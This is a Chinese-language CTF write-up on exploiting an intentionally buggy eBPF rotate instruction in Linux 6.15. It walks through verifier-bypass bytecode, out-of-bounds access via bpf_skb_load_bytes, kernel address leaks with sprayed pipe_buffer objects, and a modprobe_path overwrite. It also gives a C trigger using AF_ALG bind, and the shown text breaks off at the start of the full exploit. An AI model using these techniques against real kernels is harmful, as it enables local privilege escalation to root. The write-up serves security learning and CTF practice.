Jailbreaking eBPF

Qanux

2025-07-24

写在最前面

由于考研的缘故，博客的更新频率大幅度下降（也因为这个原因这篇博客笔者分了好几天来写），趁现在还没有进入冲刺阶段再水一篇（bushi

不知道为何，eBPF 这个老古董最近在 CTF 里面重新焕发了生机，这篇博客以 DownUnderCTF 2025 的 Rolling Around 为例讲解一下 eBPF 漏洞的利用方式。为了展示更多的东西，笔者将会 “绕远路” ，使用稍微复杂一点的方法来进行漏洞的利用

漏洞分析

这里先给出 patch 文件
kernel.patch

diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
index 85180e4aa..5290a994d 100644
--- a/include/uapi/linux/bpf.h
+++ b/include/uapi/linux/bpf.h
@@ -34,6 +34,9 @@
 #define BPF_FROM_LE	BPF_TO_LE
 #define BPF_FROM_BE	BPF_TO_BE
 
+/* alu fields */
+#define BPF_ROL         0xe0
+
 /* jmp encodings */
 #define BPF_JNE		0x50	/* jump != */
 #define BPF_JLT		0xa0	/* LT is unsigned, '<' */
diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
index c20babbf9..b79fbeb46 100644
--- a/kernel/bpf/core.c
+++ b/kernel/bpf/core.c
@@ -1578,6 +1578,7 @@ EXPORT_SYMBOL_GPL(__bpf_call_base);
 	INSN_3(ALU, ARSH, K),			\
 	INSN_3(ALU, DIV,  K),			\
 	INSN_3(ALU, MOD,  K),			\
+	INSN_3(ALU, ROL,  K),			\
 	/* 64 bit ALU operations. */		\
 	/*   Register based. */			\
 	INSN_3(ALU64, ADD,  X),			\
@@ -1607,6 +1608,7 @@ EXPORT_SYMBOL_GPL(__bpf_call_base);
 	INSN_3(ALU64, ARSH, K),			\
 	INSN_3(ALU64, DIV,  K),			\
 	INSN_3(ALU64, MOD,  K),			\
+	INSN_3(ALU64, ROL,  K),			\
 	/* Call instruction. */			\
 	INSN_2(JMP, CALL),			\
 	/* Exit instruction. */			\
@@ -1743,6 +1745,7 @@ static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
 		[BPF_LDX | BPF_PROBE_MEMSX | BPF_H] = &&LDX_PROBE_MEMSX_H,
 		[BPF_LDX | BPF_PROBE_MEMSX | BPF_W] = &&LDX_PROBE_MEMSX_W,
 	};
+
 #undef BPF_INSN_3_LBL
 #undef BPF_INSN_2_LBL
 	u32 tail_call_cnt = 0;
@@ -1859,6 +1862,12 @@ static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
 	ALU64_ARSH_K:
 		(*(s64 *) &DST) >>= IMM;
 		CONT;
+	ALU_ROL_K:
+		DST = (((u32)DST) << IMM) | (((u32)DST) >> (32 - IMM));		
+		CONT;
+	ALU64_ROL_K:
+		DST = (DST << IMM) | (DST >> (64 - IMM));		
+		CONT;
 	ALU64_MOD_X:
 		switch (OFF) {
 		case 0:
diff --git a/kernel/bpf/disasm.c b/kernel/bpf/disasm.c
index 20883c6b1..859662559 100644
--- a/kernel/bpf/disasm.c
+++ b/kernel/bpf/disasm.c
@@ -85,6 +85,7 @@ const char *const bpf_alu_string[16] = {
 	[BPF_MOV >> 4]  = "=",
 	[BPF_ARSH >> 4] = "s>>=",
 	[BPF_END >> 4]  = "endian",
+	[BPF_ROL >> 4]  = "rol",
 };
 
 static const char *const bpf_alu_sign_string[16] = {
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index a7d6e0c59..d2f97d018 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -14091,8 +14091,8 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
 	bool ptr_is_dst_reg = ptr_reg == dst_reg;
 	u8 opcode = BPF_OP(insn->code);
 	u32 alu_state, alu_limit;
-	struct bpf_reg_state tmp;
-	bool ret;
+	//struct bpf_reg_state tmp;
+	//bool ret;
 	int err;
 
 	if (can_skip_alu_sanitation(env, insn))
@@ -14161,6 +14161,8 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
 	 * and truncated reg-based in the other in order to explore
 	 * bad access.
 	 */
+
+	/*
 	if (!ptr_is_dst_reg) {
 		tmp = *dst_reg;
 		copy_register_state(dst_reg, ptr_reg);
@@ -14170,6 +14172,8 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
 	if (!ptr_is_dst_reg && ret)
 		*dst_reg = tmp;
 	return !ret ? REASON_STACK : 0;
+	*/
+	return 0;
 }
 
 static void sanitize_mark_insn_seen(struct bpf_verifier_env *env)
@@ -15050,6 +15054,48 @@ static void scalar_min_max_arsh(struct bpf_reg_state *dst_reg,
 	__update_reg_bounds(dst_reg);
 }
 
+static void __scalar32_min_max_rol(struct bpf_reg_state *dst_reg,
+				   u64 umin_val, u64 umax_val)
+{
+	dst_reg->u32_min_value = (dst_reg->u32_min_value << umin_val) | (dst_reg->u32_min_value >> (64 - umin_val));
+	dst_reg->u32_max_value = (dst_reg->u32_max_value << umax_val) | (dst_reg->u32_max_value >> (64 - umax_val));
+}
+
+static void scalar32_min_max_rol(struct bpf_reg_state *dst_reg,
+				 struct bpf_reg_state *src_reg)
+{
+	u32 umax_val = src_reg->u32_max_value;
+	u32 umin_val = src_reg->u32_min_value;
+	/* u32 alu operation will zext upper bits */
+	struct tnum subreg = tnum_subreg(dst_reg->var_off);
+
+	__scalar32_min_max_rol(dst_reg, umin_val, umax_val);
+	dst_reg->var_off = tnum_subreg(tnum_lshift(subreg, umin_val));
+	__mark_reg64_unbounded(dst_reg);
+	__update_reg32_bounds(dst_reg);
+}
+
+static void __scalar64_min_max_rol(struct bpf_reg_state *dst_reg,
+				   u64 umin_val, u64 umax_val)
+{
+	dst_reg->umin_value = (dst_reg->umin_value << umin_val) | (dst_reg->umin_value >> (64 - umin_val));
+	dst_reg->umax_value = (dst_reg->umax_value << umax_val) | (dst_reg->umax_value >> (64 - umax_val));
+}
+
+static void scalar_min_max_rol(struct bpf_reg_state *dst_reg,
+			       struct bpf_reg_state *src_reg)
+{
+	u64 umax_val = src_reg->umax_value;
+	u64 umin_val = src_reg->umin_value;
+
+	__scalar64_min_max_rol(dst_reg, umin_val, umax_val);
+	__scalar32_min_max_rol(dst_reg, umin_val, umax_val);
+
+	dst_reg->var_off = tnum_lshift(dst_reg->var_off, umin_val);
+	/* We may learn something more from the var_off */
+	__update_reg_bounds(dst_reg);
+}
+
 static bool is_safe_to_compute_dst_reg_range(struct bpf_insn *insn,
 					     const struct bpf_reg_state *src_reg)
 {
@@ -15084,12 +15130,14 @@ static bool is_safe_to_compute_dst_reg_range(struct bpf_insn *insn,
 	case BPF_LSH:
 	case BPF_RSH:
 	case BPF_ARSH:
+	case BPF_ROL:
 		return (src_is_const && src_reg->umax_value < insn_bitness);
 	default:
 		return false;
 	}
 }
 
+
 /* WARNING: This function does calculations on 64-bit values, but the actual
  * execution may occur on 32-bit values. Therefore, things like bitshifts
  * need extra checks in the 32-bit case.
@@ -15177,6 +15225,12 @@ static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
 		else
 			scalar_min_max_arsh(dst_reg, &src_reg);
 		break;
+	case BPF_ROL:
+		if (alu32)
+			scalar32_min_max_rol(dst_reg, &src_reg);
+		else
+			scalar_min_max_rol(dst_reg, &src_reg);
+		break;
 	default:
 		break;
 	}
@@ -15185,6 +15239,7 @@ static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
 	if (alu32)
 		zext_32_to_64(dst_reg);
 	reg_bounds_sync(dst_reg);
+
 	return 0;
 }
 
@@ -15510,7 +15565,7 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
 			}
 		}
 
-	} else if (opcode > BPF_END) {
+	} else if (opcode > BPF_ROL) {
 		verbose(env, "invalid BPF_ALU opcode %x\n", opcode);
 		return -EINVAL;
 
@@ -15546,7 +15601,7 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
 		}
 
 		if ((opcode == BPF_LSH || opcode == BPF_RSH ||
-		     opcode == BPF_ARSH) && BPF_SRC(insn->code) == BPF_K) {
+		     opcode == BPF_ARSH || opcode == BPF_ROL) && BPF_SRC(insn->code) == BPF_K) {
 			int size = BPF_CLASS(insn->code) == BPF_ALU64 ? 64 : 32;
 
 			if (insn->imm < 0 || insn->imm >= size) {

环境的 kernel 版本为 6.15

1 2	/ $ uname -r 6.15.0-gf66bc387efbe-dirty

这个 patch 实现了一个 eBPF 立即数的左移运算，支持 32 位和 64 位，漏洞为 __scalar32_min_max_rol 函数中错误地使用了 64 而不是 32，导致寄存器状态的最小值/最大值跟踪逻辑错误

......

+	ALU_ROL_K:

+		DST = (((u32)DST) << IMM) | (((u32)DST) >> (32 - IMM));	
......

+static void __scalar32_min_max_rol(struct bpf_reg_state *dst_reg,
+				   u64 umin_val, u64 umax_val)
+{
+	dst_reg->u32_min_value = (dst_reg->u32_min_value << umin_val) | (dst_reg->u32_min_value >> (64 - umin_val));
+	dst_reg->u32_max_value = (dst_reg->u32_max_value << umax_val) | (dst_reg->u32_max_value >> (64 - umax_val));

......

当 umin_val 或 umax_val 在 [1, 31] 范围内时，64 - umin_val 的结果（如 33-63）会导致右移位数过大，使有效位被移出，计算结果归零

例如：
若 u32_min_value = 0x80000000（最高位为 1），umin_val = 1
正确 ROL 结果应为 0x00000001
错误计算：(0x80000000 << 1) | (0x80000000 >> 63) = 0x00000000 | 0x00000000 = 0（实际应为 1）

也就是说我们可以利用这个逻辑错误构造出一个实际值为 1，而 verifier 却认为是 0 的数，进而绕过 eBPF 里面的安全检测，可用以下 eBPF 程序实现：

1
2
3

BPF_MOV32_IMM(BPF_REG_6, 0x2),                                  // R6 = 0x2
BPF_ALU32_IMM(224, BPF_REG_6, 31),                              // R6 << 31
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 0x1),                         // R6 = 0x1 [verifier 0]

漏洞利用

重要结构体

在这之前先介绍两个比较重要的结构体，这将会在我们后续的利用中用到

bpf map 是一个通用的用以储存不同种类数据的结构，用以在用户进程与 eBPF 程序、eBPF 程序与 eBPF 程序之间进行数据共享，这些数据以二进制形式储存，因此用户在创建时只需要指定 key 与 value 的 size

bpf_map

struct bpf_map {
        const struct bpf_map_ops  * ops;                 /*     0     8 */
        struct bpf_map *           inner_map_meta;       /*     8     8 */
        void *                     security;             /*    16     8 */
        enum bpf_map_type          map_type;             /*    24     4 */
        u32                        key_size;             /*    28     4 */
        u32                        value_size;           /*    32     4 */
        u32                        max_entries;          /*    36     4 */
        u64                        map_extra;            /*    40     8 */
        u32                        map_flags;            /*    48     4 */
        u32                        id;                   /*    52     4 */
        struct btf_record *        record;               /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        int                        numa_node;            /*    64     4 */
        u32                        btf_key_type_id;      /*    68     4 */
        u32                        btf_value_type_id;    /*    72     4 */
        u32                        btf_vmlinux_value_type_id; /*    76     4 */
        struct btf *               btf;                  /*    80     8 */
        char                       name[16];             /*    88    16 */
        struct mutex               freeze_mutex;         /*   104    32 */
        /* --- cacheline 2 boundary (128 bytes) was 8 bytes ago --- */
        atomic64_t                 refcnt;               /*   136     8 */
        atomic64_t                 usercnt;              /*   144     8 */
        union {
                struct work_struct work;                 /*   152    32 */
                struct callback_head rcu;                /*   152    16 */
        };                                               /*   152    32 */
        atomic64_t                 writecnt;             /*   184     8 */
        /* --- cacheline 3 boundary (192 bytes) --- */
        struct {
                const struct btf_type  * attach_func_proto; /*   192     8 */
                spinlock_t         lock;                 /*   200     4 */
                enum bpf_prog_type type;                 /*   204     4 */
                bool               jited;                /*   208     1 */
                bool               xdp_has_frags;        /*   209     1 */
        } owner;                                         /*   192    24 */

        /* XXX last struct has 6 bytes of padding */

        bool                       bypass_spec_v1;       /*   216     1 */
        bool                       frozen;               /*   217     1 */
        bool                       free_after_mult_rcu_gp; /*   218     1 */
        bool                       free_after_rcu_gp;    /*   219     1 */

        /* XXX 4 bytes hole, try to pack */

        atomic64_t                 sleepable_refcnt;     /*   224     8 */
        s64 *                      elem_count;           /*   232     8 */

        /* size: 240, cachelines: 4, members: 29 */
        /* sum members: 236, holes: 1, sum holes: 4 */
        /* paddings: 1, sum paddings: 6 */
        /* last cacheline: 48 bytes */
};

bpf map 主要有以下五个基本属性：

type：map 的数据结构类型
key_size：以字节为单位的用以索引一个元素的 key 的 size（在数组映射中使用）
value_size：以字节为单位的每个元素的 size
max_entries：map 中 entries 的最大数量
map_flags：描述 map 的独特特征，例如是否整个 map 的内存应被预先分配等

可选 map 类型如下：

enum bpf_map_type {
	BPF_MAP_TYPE_UNSPEC,
	BPF_MAP_TYPE_HASH,
	BPF_MAP_TYPE_ARRAY,
	BPF_MAP_TYPE_PROG_ARRAY,
	BPF_MAP_TYPE_PERF_EVENT_ARRAY,
	BPF_MAP_TYPE_PERCPU_HASH,
	BPF_MAP_TYPE_PERCPU_ARRAY,
	BPF_MAP_TYPE_STACK_TRACE,
	BPF_MAP_TYPE_CGROUP_ARRAY,
	BPF_MAP_TYPE_LRU_HASH,
	BPF_MAP_TYPE_LRU_PERCPU_HASH,
	BPF_MAP_TYPE_LPM_TRIE,
	BPF_MAP_TYPE_ARRAY_OF_MAPS,
	BPF_MAP_TYPE_HASH_OF_MAPS,
	BPF_MAP_TYPE_DEVMAP,
	BPF_MAP_TYPE_SOCKMAP,
	BPF_MAP_TYPE_CPUMAP,
	BPF_MAP_TYPE_XSKMAP,
	BPF_MAP_TYPE_SOCKHASH,
	BPF_MAP_TYPE_CGROUP_STORAGE_DEPRECATED,
	/* BPF_MAP_TYPE_CGROUP_STORAGE is available to bpf programs attaching
	 * to a cgroup. The newer BPF_MAP_TYPE_CGRP_STORAGE is available to
	 * both cgroup-attached and other progs and supports all functionality
	 * provided by BPF_MAP_TYPE_CGROUP_STORAGE. So mark
	 * BPF_MAP_TYPE_CGROUP_STORAGE deprecated.
	 */
	BPF_MAP_TYPE_CGROUP_STORAGE = BPF_MAP_TYPE_CGROUP_STORAGE_DEPRECATED,
	BPF_MAP_TYPE_REUSEPORT_SOCKARRAY,
	BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE,
	BPF_MAP_TYPE_QUEUE,
	BPF_MAP_TYPE_STACK,
	BPF_MAP_TYPE_SK_STORAGE,
	BPF_MAP_TYPE_DEVMAP_HASH,
	BPF_MAP_TYPE_STRUCT_OPS,
	BPF_MAP_TYPE_RINGBUF,
	BPF_MAP_TYPE_INODE_STORAGE,
	BPF_MAP_TYPE_TASK_STORAGE,
	BPF_MAP_TYPE_BLOOM_FILTER,
	BPF_MAP_TYPE_USER_RINGBUF,
	BPF_MAP_TYPE_CGRP_STORAGE,
};

常用的主要是以下几种类型：

BPF_MAP_TYPE_HASH：以哈希表形式存储键值对，比较常规
BPF_MAP_TYPE_ARRAY：以数组形式存储键值对，key 即为数组下标，对应的 value 皆初始化为 0
BPF_MAP_TYPE_PROG_ARRAY：特殊的数组映射，value 为其他 eBPF 程序的文件描述符
BPF_MAP_TYPE_STACK：以栈形式存储数据

当我们在用户态创建一个 bpf_array 的 bpf_map 时，内核态就会创建一个 bpf_array 结构体

bpf_array

struct bpf_array {
        struct bpf_map             map;                  /*     0   240 */
        /* --- cacheline 3 boundary (192 bytes) was 48 bytes ago --- */
        u32                        elem_size;            /*   240     4 */
        u32                        index_mask;           /*   244     4 */
        struct bpf_array_aux *     aux;                  /*   248     8 */
        /* --- cacheline 4 boundary (256 bytes) --- */
        union {
                struct {
                        struct {
                        } __empty_value;                 /*   256     0 */
                        char       value[0];             /*   256     0 */
                };                                       /*   256     0 */
                struct {
                        struct {
                        } __empty_ptrs;                  /*   256     0 */
                        void *     ptrs[0];              /*   256     0 */
                };                                       /*   256     0 */
                struct {
                        struct {
                        } __empty_pptrs;                 /*   256     0 */
                        void *     pptrs[0];             /*   256     0 */
                };                                       /*   256     0 */
        };                                               /*   256     0 */

        /* size: 256, cachelines: 4, members: 5 */
};

value 数组存放在 bpf_array 的最下方。这需要注意的是，value 的数量以及大小是可控的，也就是说这个 bpf_array 结构体的大小也是可控的，这极大的方便了我们后续漏洞的利用。

地址泄露

有了个实际值为 1 而 verifier 为 0 的寄存器（后面称为 victim_reg）后，我们就能够构造出各种指针越界或者绕过各种 eBPF 内部的长度检测。

但是我们不能直接将 victim_reg 直接与指针进行运算，因为在下面这个 commit 中对 ALU Sanitation 进行了进一步的加强


diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index e41b6326e3e67c..0399ac092b3639 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -5871,7 +5871,7 @@ static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
 	bool off_is_neg = off_reg->smin_value < 0;
 	bool mask_to_left = (opcode == BPF_ADD &&  off_is_neg) ||
 			    (opcode == BPF_SUB && !off_is_neg);
-	u32 off, max = 0, ptr_limit = 0;
+	u32 max = 0, ptr_limit = 0;
 
 	if (!tnum_is_const(off_reg->var_off) &&
 	    (off_reg->smin_value < 0) != (off_reg->smax_value < 0))
@@ -5880,26 +5880,18 @@ static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
 	switch (ptr_reg->type) {
 	case PTR_TO_STACK:
 		/* Offset 0 is out-of-bounds, but acceptable start for the
-		 * left direction, see BPF_REG_FP.
+		 * left direction, see BPF_REG_FP. Also, unknown scalar
+		 * offset where we would need to deal with min/max bounds is
+		 * currently prohibited for unprivileged.
 		 */
 		max = MAX_BPF_STACK + mask_to_left;
-		/* Indirect variable offset stack access is prohibited in
-		 * unprivileged mode so it's not handled here.
-		 */
-		off = ptr_reg->off + ptr_reg->var_off.value;
-		if (mask_to_left)
-			ptr_limit = MAX_BPF_STACK + off;
-		else
-			ptr_limit = -off - 1;
+		ptr_limit = -(ptr_reg->var_off.value + ptr_reg->off);
 		break;
 	case PTR_TO_MAP_VALUE:
 		max = ptr_reg->map_ptr->value_size;
-		if (mask_to_left) {
-			ptr_limit = ptr_reg->umax_value + ptr_reg->off;
-		} else {
-			off = ptr_reg->smin_value + ptr_reg->off;
-			ptr_limit = ptr_reg->map_ptr->value_size - off - 1;
-		}
+		ptr_limit = (mask_to_left ?
+			     ptr_reg->smin_value :
+			     ptr_reg->umax_value) + ptr_reg->off;
 		break;
 	default:
 		return REASON_TYPE;
@@ -5954,10 +5946,12 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
 			    struct bpf_insn *insn,
 			    const struct bpf_reg_state *ptr_reg,
 			    const struct bpf_reg_state *off_reg,
-			    struct bpf_reg_state *dst_reg)
+			    struct bpf_reg_state *dst_reg,
+			    struct bpf_insn_aux_data *tmp_aux,
+			    const bool commit_window)
 {
+	struct bpf_insn_aux_data *aux = commit_window ? cur_aux(env) : tmp_aux;
 	struct bpf_verifier_state *vstate = env->cur_state;
-	struct bpf_insn_aux_data *aux = cur_aux(env);
 	bool off_is_neg = off_reg->smin_value < 0;
 	bool ptr_is_dst_reg = ptr_reg == dst_reg;
 	u8 opcode = BPF_OP(insn->code);
@@ -5976,18 +5970,33 @@ static int sanitize_ptr_alu(struct bpf_verifier_env *env,
 	if (vstate->speculative)
 		goto do_sim;
 
-	alu_state  = off_is_neg ? BPF_ALU_NEG_VALUE : 0;
-	alu_state |= ptr_is_dst_reg ?
-		     BPF_ALU_SANITIZE_SRC : BPF_ALU_SANITIZE_DST;
-
 	err = retrieve_ptr_limit(ptr_reg, off_reg, &alu_limit, opcode);
 	if (err < 0)
 		return err;
 
+	if (commit_window) {
+		/* In commit phase we narrow the masking window based on
+		 * the observed pointer move after the simulated operation.
+		 */
+		alu_state = tmp_aux->alu_state;
+		alu_limit = abs(tmp_aux->alu_limit - alu_limit);
+	} else {
+		alu_state  = off_is_neg ? BPF_ALU_NEG_VALUE : 0;
+		alu_state |= ptr_is_dst_reg ?
+			     BPF_ALU_SANITIZE_SRC : BPF_ALU_SANITIZE_DST;
+	}
+
 	err = update_alu_sanitation_state(aux, alu_state, alu_limit);
 	if (err < 0)
 		return err;
 do_sim:
+	/* If we're in commit phase, we're done here given we already
+	 * pushed the truncated dst_reg into the speculative verification
+	 * stack.
+	 */
+	if (commit_window)
+		return 0;
+
 	/* Simulate and find potential out-of-bounds access under
 	 * speculative execution from truncation as a result of
 	 * masking when off was not within expected range. If off
@@ -6130,6 +6139,7 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 	    smin_ptr = ptr_reg->smin_value, smax_ptr = ptr_reg->smax_value;
 	u64 umin_val = off_reg->umin_value, umax_val = off_reg->umax_value,
 	    umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;
+	struct bpf_insn_aux_data tmp_aux = {};
 	u8 opcode = BPF_OP(insn->code);
 	u32 dst = insn->dst_reg;
 	int ret;
@@ -6196,12 +6206,15 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 	/* pointer types do not carry 32-bit bounds at the moment. */
 	__mark_reg32_unbounded(dst_reg);
 
-	switch (opcode) {
-	case BPF_ADD:
-		ret = sanitize_ptr_alu(env, insn, ptr_reg, off_reg, dst_reg);
+	if (sanitize_needed(opcode)) {
+		ret = sanitize_ptr_alu(env, insn, ptr_reg, off_reg, dst_reg,
+				       &tmp_aux, false);
 		if (ret < 0)
 			return sanitize_err(env, insn, ret, off_reg, dst_reg);
+	}
 
+	switch (opcode) {
+	case BPF_ADD:
 		/* We can take a fixed offset as long as it doesn't overflow
 		 * the s32 'off' field
 		 */
@@ -6252,10 +6265,6 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 		}
 		break;
 	case BPF_SUB:
-		ret = sanitize_ptr_alu(env, insn, ptr_reg, off_reg, dst_reg);
-		if (ret < 0)
-			return sanitize_err(env, insn, ret, off_reg, dst_reg);
-
 		if (dst_reg == off_reg) {
 			/* scalar -= pointer.  Creates an unknown scalar */
 			verbose(env, "R%d tried to subtract pointer from scalar\n",
@@ -6338,6 +6347,12 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 
 	if (sanitize_check_bounds(env, insn, dst_reg) < 0)
 		return -EACCES;
+	if (sanitize_needed(opcode)) {
+		ret = sanitize_ptr_alu(env, insn, dst_reg, off_reg, dst_reg,
+				       &tmp_aux, true);
+		if (ret < 0)
+			return sanitize_err(env, insn, ret, off_reg, dst_reg);
+	}
 
 	return 0;
 }

alu_limit 的计算方式发生了改变，不是使用指针寄存器的当前位置，而是使用一个 offset 寄存器
被认为是常数的寄存器赋值会被直接更改为常量赋值

这个时候我们可以利用 bpf_skb_load_bytes 这个函数

long bpf_skb_load_bytes(const void *skb, u32 offset, void *to,
u32 len)

        Description
            This helper was provided as an easy way to load
            data from a packet. It can be used to load len
            bytes from offset from the packet associated to
            skb, into the buffer pointed by to.

            Since Linux 4.7, usage of this helper has mostly
            been replaced by "direct packet access", enabling
            packet data to be manipulated with skb->data and
            skb->data_end pointing respectively to the first
            byte of packet data and to the byte after the last
            byte of packet data. However, it remains useful if
            one wishes to read large quantities of data at once
            from a packet into the eBPF stack.

        Return 0 on success, or a negative error in case of
            failure.

bpf_skb_load_bytes 函数可以将 map 中的数据拷贝到 eBPF 的栈上，且长度可控。我们可以将 epbf_map 的 value 指针保存在 eBPF stack 上然后利用 victim_reg 构造一个非法的 size 令 bpf_skb_load_bytes 在拷贝时出现越界进而修改 value 指针。

我们知道 value 指针是指向 bpf_array 的下方的 value，而这个地址是在堆上的。我们暂时不管 bpf_array 是在哪个 kmem_cache 中分配的，我们直接把目光放向别的 kmem_cache

上面我们分析过 bpf_array 的 size 是可控的，也就是说我们可以令这玩意分配到几乎所有我们想要的 order 上（附近有结构体那种😇🤣），而我们可以在与这个 bpf_array 的 slab 相邻的 page 上喷任何我们想要的结构体（对于不同 order 的结构体我们可以相应的修改 bpf_array 的 order 使之与之相邻）

这时候我们利用 bpf_skb_load_bytes 的溢出修改 value 指针的低 2 位为 \x?0\x00（?的取值为 0-15，这里循环修改 16次），在进行合理的页风水的情况下我们可以接近百分百的让 value 指向我们想要命中的结构体，进而利用 bpf_map_lookup_elem 从 value 中读取我们要泄露的地址信息。这里笔者选择在 bpf_array 附近喷 pipe_buffer，并通过泄露 pipe_buf_operations 进而泄露出内核的地址（当然也可以进行写操作）。总流程如下图：

任意地址写

在利用上面的方法泄露出地址后我们就可以顺理成章的利用 bpf_skb_load_bytes 将 value 覆盖为我们想要进行写入的地址即可，easy :)

这里我选择修改 modprobe 来进行提权，因为在 6.15+ 的 kernel 中 modprobe 的触发方式有所改变，所以这里为了所谓的 “绕远路” 所以选这了这个方法（其实笔者更想通过修改 PTE 来现在内核任意物理地址级别的读写）

高版本modprobe

在高版本的内核中存在下面这个 patch：


diff --git a/fs/exec.c b/fs/exec.c
index 4057b8c3e23391..e0435b31a811af 100644
--- a/fs/exec.c
+++ b/fs/exec.c
@@ -1723,13 +1723,11 @@ int remove_arg_zero(struct linux_binprm *bprm)
 }
 EXPORT_SYMBOL(remove_arg_zero);
 
-#define printable(c) (((c)=='\t') || ((c)=='\n') || (0x20<=(c) && (c)<=0x7e))
 /*
  * cycle the list of binary formats handler, until one recognizes the image
  */
 static int search_binary_handler(struct linux_binprm *bprm)
 {
-	bool need_retry = IS_ENABLED(CONFIG_MODULES);
 	struct linux_binfmt *fmt;
 	int retval;
 
@@ -1741,8 +1739,6 @@ static int search_binary_handler(struct linux_binprm *bprm)
 	if (retval)
 		return retval;
 
-	retval = -ENOENT;
- retry:
 	read_lock(&binfmt_lock);
 	list_for_each_entry(fmt, &formats, lh) {
 		if (!try_module_get(fmt->module))
@@ -1760,17 +1756,7 @@ static int search_binary_handler(struct linux_binprm *bprm)
 	}
 	read_unlock(&binfmt_lock);
 
-	if (need_retry) {
-		if (printable(bprm->buf[0]) && printable(bprm->buf[1]) &&
-		    printable(bprm->buf[2]) && printable(bprm->buf[3]))
-			return retval;
-		if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
-			return retval;
-		need_retry = false;
-		goto retry;
-	}
-
-	return retval;
+	return -ENOEXEC;
 }
 
 /* binfmt handlers will call back into begin_new_exec() on success. */

导致我们无法直接通过执行类似 \xff\xff\xff\xff 这样的命令来触发 modprobe_path :(
在 v6.14-rc1 之前的内核版本中，当用户尝试执行以幻数（例如 \xff\xff\xff\xff）开头的虚拟文件时，会触发以下调用堆栈：

sys_execve()
  => do_execve()
    => do_execveat_common()
      => bprm_execve()
        => exec_binprm()
          => search_binary_handler()
            => request_module()
              => __request_module()
                => call_modprobe()
                  => call_usermodehelper_exec()
                    => queue_work(call_usermodehelper_exec_work)
[ kworker ]
call_usermodehelper_exec_work()
  => call_usermodehelper_exec_sync()
    => call_usermodehelper_exec_async()
      => kernel_execve()

在调用堆栈中，call_modprobe 从全局变量 modprobe_path 中检索文件路径，然后调用 call_usermodehelper_exec，在用户空间的指定路径处执行文件

查看这个 patch，调用 request_module 部分的代码已被完全删除，因此 search_binary_handler 不再调用 request_module

但我们依然能找到一些 syscall 可以调用它，Syzscope/SyzBridge 就曾 fuzz 过：

这里我们可以使用 AF_ALG socket，AF_ALG 是一个基于套接字的接口，允许用户空间访问内核的加密 API。当在此套接字上调用 bind 时，它会触发 alg_bind 函数。此函数搜索与用户提供的 sa->salg_type 相对应的类型，如果未找到，则调用 request_module 以尝试加载 “algif-%s” 模块

static const struct proto_ops alg_proto_ops = {
        .family         =       PF_ALG,
        .owner          =       THIS_MODULE,
        ...
        .bind           =       alg_bind,
        .release        =       af_alg_release,
        .setsockopt     =       alg_setsockopt,
        .accept         =       alg_accept,
};
static int alg_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len)
{
        const u32 allowed = CRYPTO_ALG_KERN_DRIVER_ONLY;
        struct sock *sk = sock->sk;
        struct alg_sock *ask = alg_sk(sk);
        struct sockaddr_alg_new *sa = (void *)uaddr;
        const struct af_alg_type *type;
        void *private;
        int err;
        ...
        sa->salg_type[sizeof(sa->salg_type) - 1] = 0;
        sa->salg_name[addr_len - sizeof(*sa) - 1] = 0;
        type = alg_get_type(sa->salg_type);   
        if (PTR_ERR(type) == -ENOENT) {
                request_module("algif-%s", sa->salg_type);  
                type = alg_get_type(sa->salg_type);
        }

poc 如下：

int trigger_modprobe(){
    struct sockaddr_alg sa;

    int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (alg_fd < 0) {
            perror("socket(AF_ALG) failed");
            return 1;
    }

    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    strcpy((char *)sa.salg_type, "Qanux");  // dummy string
    bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));
    return 1;
}

exp

最终 exp 如下：

// musl-gcc exp.c --static -masm=intel -lpthread -idirafter /usr/include/ -idirafter /usr/include/x86_64-linux-gnu/ -o exp

#define _GNU_SOURCE

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <linux/keyctl.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <stddef.h>
#include <sys/utsname.h>
#include <stdbool.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <linux/userfaultfd.h>
#include <sys/socket.h>
#include <asm/ldt.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include <bpf/libbpf.h>
#include <linux/bpf_common.h>
#include <linux/if_alg.h>
#include "bpf_insn.h"

int sockets[2];
int map_fd1;
int map_fd2;
int prog_fd;
uint32_t key;
